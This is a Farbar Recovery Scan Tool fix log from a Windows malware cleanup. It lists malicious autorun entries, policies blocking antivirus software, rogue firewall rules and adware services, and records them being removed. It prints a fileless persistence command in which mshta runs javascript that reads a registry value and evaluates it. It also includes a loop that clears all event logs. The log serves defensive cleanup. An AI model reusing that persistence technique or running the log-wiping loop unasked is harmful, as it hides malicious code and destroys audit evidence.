Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017 Ran by Admin (10-04-2017 23:37:04) Run:1 Running from C:\Users\Admin\Desktop Loaded Profiles: Admin & Administrator (Available Profiles: Admin & Administrator) Boot Mode: Normal ============================================== fixlist content: ***************** HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2168416 2017-02-22] (Hola Networks Ltd.) <===== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [Orvhics] => regsvr32.exe C:\Users\Admin\AppData\Local\Orvhics\crjcewng.dll <===== ATTENTION HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [YvghPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ilbsoft\mhkforlr.dll <===== ATTENTION HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [*atfxx<*>] => "C:\Users\Admin\AppData\Local\5427bc7\6663ade.bat" <===== ATTENTION (Value Name with invalid characters) GroupPolicy: Restriction - Chrome <======= ATTENTION C:\Users\Admin\AppData\Local\5427bc7 C:\Users\Admin\AppData\Local\Ilbsoft C:\Users\Admin\AppData\Local\Orvhics C:\Program Files\Hola R2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [5622368 2017-02-22] (Hola Networks Ltd.) <==== ATTENTION R2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [5618864 2016-08-31] (Hola Networks Ltd.) [File not signed] <==== ATTENTION HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Classes\fa112f2: "C:\WINDOWS\system32\mshta.exe" "javascript:ROZV5mbH="3U";UL04=new ActiveXObject("WScript.Shell");mPuoi4="x1BpH";MnI2U=UL04.RegRead("HKCU\\software\\pqsrp\\jlcjj");h6cv2m="QVU";eval(MnI2U);qQe8e3ant="OPCYXMkS";" <===== ATTENTION ATTENTION: System Restore is disabled ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File 2017-04-09 13:55 - 2016-07-08 21:13 - 00000000 ____D C:\Temp 2017-04-04 10:30 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-04-09 16:54 - 2017-04-09 16:54 - 0152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll 2017-03-31 00:15 - 2017-03-31 00:15 - 0152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext3828717390359039331.dll 2017-04-09 14:21 - 2017-04-09 14:22 - 0152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext7308831775991178666.dll 2017-04-09 16:54 - 2017-04-09 16:54 - 00152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll FirewallRules: [{0BD60C3F-28EE-4F60-8DCB-A85E310B63F0}] => (Allow) C:\Users\Admin\AppData\Local\Temp\andy-x64\Setup.exe FirewallRules: [{0C3720BF-0AA7-49C2-8F52-3BC27DF53552}] => (Allow) C:\Users\Admin\AppData\Local\Temp\andy-x64\Setup.exe FirewallRules: [{F0032B48-523A-4821-8BEF-92E8592327F3}] => (Allow) C:\Users\Admin\AppData\Local\Temp\MPCOnline\MPCDownload.exe FirewallRules: [{9ED913E4-C72A-41AE-8BB0-0A1C662F15A5}] => (Allow) C:\Users\Admin\AppData\Local\Temp\MPCOnline\MPCDownload.exe (Lingobit Technologies & RePack by Dodakaedr) C:\Users\Admin\AppData\Local\Ilbsoft\tmpF873.exe HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [Ilbsoft] => C:\Users\Admin\AppData\Local\Ilbsoft\tmpF873.exe [270336 2017-04-09] (Lingobit Technologies & RePack by Dodakaedr) CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: ipconfig /flushdns CMD: netsh winsock reset catalog CMD: netsh int ip reset C:\resettcpip.txt CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" CMD: Bitsadmin /Reset /Allusers EMPTYTEMP: Reboot: ***************** HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\hola => value removed successfully HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION => restored successfully HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION => restored successfully HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION => restored successfully HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore => key removed successfully HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Orvhics => value not found. HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YvghPack => value removed successfully HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\*atfxx<*> => value removed successfully C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully C:\Users\Admin\AppData\Local\5427bc7 => moved successfully C:\Users\Admin\AppData\Local\Ilbsoft => moved successfully C:\Users\Admin\AppData\Local\Orvhics => moved successfully "C:\Program Files\Hola" folder move: Could not move "C:\Program Files\Hola" => Scheduled to move on reboot. hola_svc => Unable to stop service. HKLM\System\CurrentControlSet\Services\hola_svc => key removed successfully hola_svc => service removed successfully hola_updater => Unable to stop service. HKLM\System\CurrentControlSet\Services\hola_updater => key removed successfully hola_updater => service removed successfully HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Classes\fa112f2 => key removed successfully ATTENTION: System Restore is disabled => Error: No automatic fix found for this entry. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => key removed successfully HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found. C:\Temp => moved successfully C:\WINDOWS\CbsTemp => moved successfully C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll => moved successfully C:\Users\Admin\AppData\Local\Temp\ext3828717390359039331.dll => moved successfully C:\Users\Admin\AppData\Local\Temp\ext7308831775991178666.dll => moved successfully "C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll" => not found. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0BD60C3F-28EE-4F60-8DCB-A85E310B63F0} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0C3720BF-0AA7-49C2-8F52-3BC27DF53552} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F0032B48-523A-4821-8BEF-92E8592327F3} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9ED913E4-C72A-41AE-8BB0-0A1C662F15A5} => value removed successfully [8660] C:\Users\Admin\AppData\Local\Ilbsoft\tmpF873.exe => process closed successfully. HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Ilbsoft => value removed successfully ========= netsh advfirewall reset ========= An error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again. ========= End of CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= An error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again. ========= End of CMD: ========= ========= ipconfig /flushdns ========= Windows IP Configuration Successfully flushed the DNS Resolver Cache. ========= End of CMD: ========= ========= netsh winsock reset catalog ========= Sucessfully reset the Winsock Catalog. You must restart the computer in order to complete the reset. ========= End of CMD: ========= ========= netsh int ip reset C:\resettcpip.txt ========= Resetting Global, OK! Resetting Interface, OK! Resetting Unicast Address, OK! Resetting Neighbor, OK! Resetting Path, OK! Resetting , failed. Access is denied. Resetting , OK! Restart the computer to complete this action. ========= End of CMD: ========= ========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" ========= Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied. Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied. Failed to clear log Microsoft-Windows-USBVideo/Analytic. The instance name passed was not recognized as valid by a WMI data provider. ========= End of CMD: ========= ========= Bitsadmin /Reset /Allusers ========= BITSADMIN version 3.0 BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. {01B20EBD-9F83-4E82-BF76-244031E84488} canceled. 1 out of 1 jobs canceled. ========= End of CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 32768 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 314005072 B Java, Flash, Steam htmlcache => 37147935 B Windows/system/drivers => 280241719 B Edge => 2256309 B Chrome => 579626355 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 128 B systemprofile32 => 128 B LocalService => 124104 B NetworkService => 1007908 B Admin => 532043285 B Administrator => 103733794 B RecycleBin => 757341397 B EmptyTemp: => 2.4 GB temporary data Removed. ================================ Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 10-04-2017 23:46:43) C:\Program Files\Hola => Is moved successfully ==== End of Fixlog 23:46:43 ====